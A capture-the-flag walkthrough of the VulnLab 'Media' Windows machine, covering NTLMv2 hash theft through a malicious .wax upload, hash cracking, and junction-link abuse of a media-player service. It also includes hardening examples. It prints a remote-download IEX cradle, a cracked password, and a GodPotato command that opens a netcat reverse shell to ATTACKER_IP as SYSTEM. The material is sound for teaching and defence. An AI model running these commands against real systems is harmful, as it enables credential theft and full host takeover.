Overview

Name: Media
OS: Windows
Difficulty: Medium
Platform: VulnLab
Topics: NTLMv2 Theft, Hash Cracking, Junction Link Abuse, SeImpersonate

Services Scan

Nmap reveals three open ports: SSH (22), HTTP (80), and RDP (3389).

PORT     STATE SERVICE       REASON          VERSION
22/tcp   open  ssh           syn-ack ttl 127 OpenSSH for_Windows_9.5
80/tcp   open  http          syn-ack ttl 127 Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.1.17)
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: ProMotion Studio
|_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA
3389/tcp open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services

Attacking HTTP

The homepage exposes a form that accepts file uploads, stating the file will be played by Windows Media Player. This is the entry point for stealing credentials.

Steal NTLMv2

Using ntlm_thief, craft a malicious .wax file (a format supported by Windows Media Player) pointing back to the attacker’s machine. Start responder to capture the incoming authentication:

responder -I tun0

Upload the .wax file via the web form. As expected, Responder captures the NTLMv2 hash.
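From the defending side, as an added example that is not part of the writeup: the two host-level controls that stop a coerced NetNTLMv2 authentication from ever leaving the server, checked and optionally enforced from an elevated PowerShell session on the Windows host. The registry key and value are the ones behind the "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" policy; the firewall rule name is a constructed label.

```powershell
# Added example (not from the writeup): report, and optionally enforce, the
# host controls that keep outgoing NTLM from reaching a remote listener.
# Run from an elevated PowerShell on the server.

$LsaMsv1Key = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0'
$RuleName   = 'Block outbound SMB (NTLM theft mitigation)'   # constructed rule name

function Get-NtlmEgressPosture {
    # RestrictSendingNTLMTraffic: 0 = allow all, 1 = audit all, 2 = deny all
    $value = (Get-ItemProperty -Path $LsaMsv1Key -Name 'RestrictSendingNTLMTraffic' `
                  -ErrorAction SilentlyContinue).RestrictSendingNTLMTraffic
    $rule  = Get-NetFirewallRule -DisplayName $RuleName -ErrorAction SilentlyContinue

    [pscustomobject]@{
        OutgoingNtlmPolicy = if ($null -eq $value) { 'not set (allow)' }
                             elseif ($value -eq 2) { 'deny' }
                             elseif ($value -eq 1) { 'audit only' }
                             else                  { 'allow' }
        OutboundSmbBlocked = [bool]($rule -and $rule.Enabled -eq 'True' -and $rule.Action -eq 'Block')
    }
}

function Set-NtlmEgressHardening {
    param([ValidateSet(1, 2)] [int] $NtlmMode = 2)   # 1 = audit first, 2 = deny

    # Deny (or audit) outgoing NTLM to remote servers. A media player or any
    # other process that follows a UNC reference then cannot answer a
    # challenge from a machine outside the allowed list.
    New-Item -Path $LsaMsv1Key -Force | Out-Null
    Set-ItemProperty -Path $LsaMsv1Key -Name 'RestrictSendingNTLMTraffic' -Value $NtlmMode -Type DWord

    # Belt and braces: block outbound SMB entirely, so the remote share is
    # never reached in the first place.
    if (-not (Get-NetFirewallRule -DisplayName $RuleName -ErrorAction SilentlyContinue)) {
        New-NetFirewallRule -DisplayName $RuleName -Direction Outbound -Protocol TCP `
            -RemotePort 445 -Action Block -Profile Any | Out-Null
    }
}

# Usage: inspect first, then harden and re-check.
Get-NtlmEgressPosture
# Set-NtlmEgressHardening -NtlmMode 1   # audit run
# Set-NtlmEgressHardening              # enforce
```

Roll the registry value out as audit (1) first and watch the Microsoft-Windows-NTLM/Operational log for legitimate outgoing NTLM that would break under deny (2); those servers belong in the policy's exception list before switching to 2. The firewall rule only covers SMB, so WebDAV fallbacks over 80/443 still need the NTLM policy to be effective.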

Crack the NTLM Hash

Identify the hash type using haiti:

haitichk enox.ntlm

NetNTLMv2 (vanilla) [HC: 5600] [JtR: netntlmv2]
NetNTLMv2 (NT) [HC: 27100] [JtR: netntlmv2]

Crack with Hashcat using mode 5600:

hashcat -m 5600 enox.ntlm `fzf_wdlist`

Result: ENOX::MEDIA:<hash>:1234virus@


Privilege Escalation

The cracked credentials are valid for SSH. Running PowerUp.ps1 yields nothing useful, but Seatbelt reveals an interesting file:

IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.105/PowerSharpPack.ps1')
PowerSharpPack -seatbelt -Command "-group=user,misc"

Output highlights:

C:\Users\enox\Documents\review.ps1

Analyze review.ps1

The script runs as a service, periodically reading C:\Windows\Tasks\Uploads\todo.txt and opening files in Windows Media Player. Key logic:

# Paths used by the service: the todo list it polls and the player it launches.
$todofile="C:\\Windows\\Tasks\\Uploads\\todo.txt"   # "\\" is literal in PowerShell; Windows collapses the doubled separator
$mediaPlayerPath = "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"

# Poll forever: an empty todo.txt means there is nothing to play.
while($True){
    if ((Get-Content -Path $todofile) -eq $null) {
        Sleep 60
    } else {
        # Get-Values (defined elsewhere in the script) parses the next entry
        # into a file name and the folder it was stored under.
        $result = Get-Values -FilePath $todofile
        $filename = $result.FileName
        $randomVariable = $result.RandomVariable

        # The path is built from submitted values with no canonicalisation and
        # no reparse-point check, so a junction under uploads\ is followed.
        Start-Process -FilePath $mediaPlayerPath -ArgumentList "C:\Windows\Tasks\uploads\$randomVariable\$filename"

        Start-Sleep -Seconds 15
        Stop-Process -Name "wmplayer" -Force
        UpdateTodo -FilePath $todofile    # defined elsewhere: drops the processed entry
        Sleep 15
    }
}

The folder name ($randomVariable) is not truly random: it is derived deterministically from what was submitted via the form, so an attacker who knows the submission can predict the folder.

Since we lack write access to C:\xampp\htdocs directly, we create a junction link that points C:\Windows\Tasks\uploads\<FOLDER_NAME> at C:\xampp\htdocs, exploiting the service account’s write permission on C:\:

mklink /J C:\Windows\Tasks\uploads\FOLDER_NAME C:\xampp\htdocs
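The defensive counterpart, as an added example that is neither the box's review.ps1 nor code from the writeup: a replacement for the dispatch step that canonicalises the path, confines it to the uploads root, refuses any reparse point (junction or symlink) between the root and the file, and applies an extension allowlist. It keeps the original script's $todofile and $mediaPlayerPath values and reuses its Get-Values and UpdateTodo helpers (not shown on the page); the $uploadRoot name and the allowlist are assumptions.

```powershell
# Added hardening example (not the box's review.ps1). Assumes the original
# script's Get-Values / UpdateTodo helpers are defined above this point.
$todofile        = 'C:\Windows\Tasks\Uploads\todo.txt'
$mediaPlayerPath = 'C:\Program Files (x86)\Windows Media Player\wmplayer.exe'
$uploadRoot      = 'C:\Windows\Tasks\Uploads'                   # assumed root name
$allowedExt      = @('.mp3', '.wav', '.wma', '.wmv', '.mp4')    # assumed allowlist

function Test-SafeMediaPath {
    param([string] $Root, [string] $Folder, [string] $FileName)

    # Each submitted piece must be exactly one path component: no separators,
    # no drive letters, no "." or "..".
    foreach ($part in @($Folder, $FileName)) {
        if ([string]::IsNullOrWhiteSpace($part) -or $part -in @('.', '..') -or
            $part.IndexOfAny([System.IO.Path]::GetInvalidFileNameChars()) -ge 0) {
            return $false
        }
    }

    # Canonicalise and confine: the full path must sit under the root.
    $rootFull = [System.IO.Path]::GetFullPath($Root).TrimEnd('\')
    $full     = [System.IO.Path]::GetFullPath((Join-Path (Join-Path $rootFull $Folder) $FileName))
    if (-not $full.StartsWith($rootFull + '\', [System.StringComparison]::OrdinalIgnoreCase)) {
        return $false
    }

    # Walk from the file's directory up to the root. Any reparse point on the
    # way (a junction made with mklink /J, or a symlink) is refused, so a
    # redirect of uploads\<folder> into another tree is never followed.
    $dir = [System.IO.Path]::GetDirectoryName($full)
    while ($true) {
        $item = Get-Item -LiteralPath $dir -Force -ErrorAction SilentlyContinue
        if (-not $item -or ($item.Attributes -band [System.IO.FileAttributes]::ReparsePoint)) {
            return $false
        }
        if ($dir.TrimEnd('\') -ieq $rootFull) { break }
        $dir = [System.IO.Path]::GetDirectoryName($dir)
        if (-not $dir) { return $false }
    }

    # The file itself: must exist, be a regular file, not a reparse point,
    # and carry an allowed media extension.
    $file = Get-Item -LiteralPath $full -Force -ErrorAction SilentlyContinue
    if (-not $file -or $file.PSIsContainer -or
        ($file.Attributes -band [System.IO.FileAttributes]::ReparsePoint)) {
        return $false
    }
    return $allowedExt -contains $file.Extension.ToLowerInvariant()
}

while ($true) {
    if ($null -eq (Get-Content -Path $todofile -ErrorAction SilentlyContinue)) {
        Start-Sleep -Seconds 60
        continue
    }
    $result = Get-Values -FilePath $todofile
    if (Test-SafeMediaPath -Root $uploadRoot -Folder $result.RandomVariable -FileName $result.FileName) {
        $target = Join-Path (Join-Path $uploadRoot $result.RandomVariable) $result.FileName
        Start-Process -FilePath $mediaPlayerPath -ArgumentList "`"$target`""
        Start-Sleep -Seconds 15
        Stop-Process -Name 'wmplayer' -Force -ErrorAction SilentlyContinue
    } else {
        Write-Warning "Rejected todo entry '$($result.RandomVariable)\$($result.FileName)'"
    }
    UpdateTodo -FilePath $todofile      # drop the entry whether it was played or rejected
    Start-Sleep -Seconds 15
}
```

The reparse-point walk is the part that matters here: a junction is a valid directory as far as Start-Process is concerned, so only an explicit attribute check catches it. Pair this with running the watcher under a dedicated service account that has no write access to C:\ or the web root, so that a bypass of the check still lands in a directory that nothing else executes from.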

The attack flow looks like this:

flowchart TD
    A[Upload .wax via Web Form] --> B[Responder Captures NTLMv2]
    B --> C[Crack Hash with Hashcat]
    C --> D[SSH as enox]
    D --> E[Discover review.ps1 via Seatbelt]
    E --> F[Identify deterministic folder name]
    F --> G[Create Junction Link\nTasks/uploads/FOLDER → htdocs]
    G --> H[Upload PHP Reverse Shell]
    H --> I[Trigger via HTTP Request]
    I --> J[Shell as Local Service Account]
    J --> K[FullPowers → Recover SeImpersonate]
    K --> L[GodPotato → Shell as SYSTEM]

Shell as Service Account

Upload a PHP reverse shell to the web root via the junction link, set up a listener, and trigger execution by requesting the shell URL. This yields a shell as the Local Service account.

Use FullPowers to recover the default privilege set of the service account, including SeAssignPrimaryToken and SeImpersonate:

.\FullPowers.exe

Abuse SeImpersonate

With SeImpersonate in hand, use GodPotato to escalate to SYSTEM:

.\gp.exe -cmd "C:\xampp\nc.exe -e cmd.exe ATTACKER_IP PORT"

Shell received as NT AUTHORITY\SYSTEM. 🎉


Key Takeaways

  • .wax files can be weaponized as NTLM theft vectors against Windows Media Player — always consider what file types a target application processes.
  • Weak or reused passwords make hash cracking trivial; 1234virus@ is not a strong credential.
  • Deterministic “random” variables in scripts are a design flaw — predictable values enable junction link abuse without needing direct write access to the target directory.
  • Junction links are a powerful Windows-specific technique to redirect file I/O from a writable path into a restricted one.
  • SeImpersonate + GodPotato remains a reliable and consistent path from Local Service to SYSTEM on unpatched or misconfigured Windows hosts.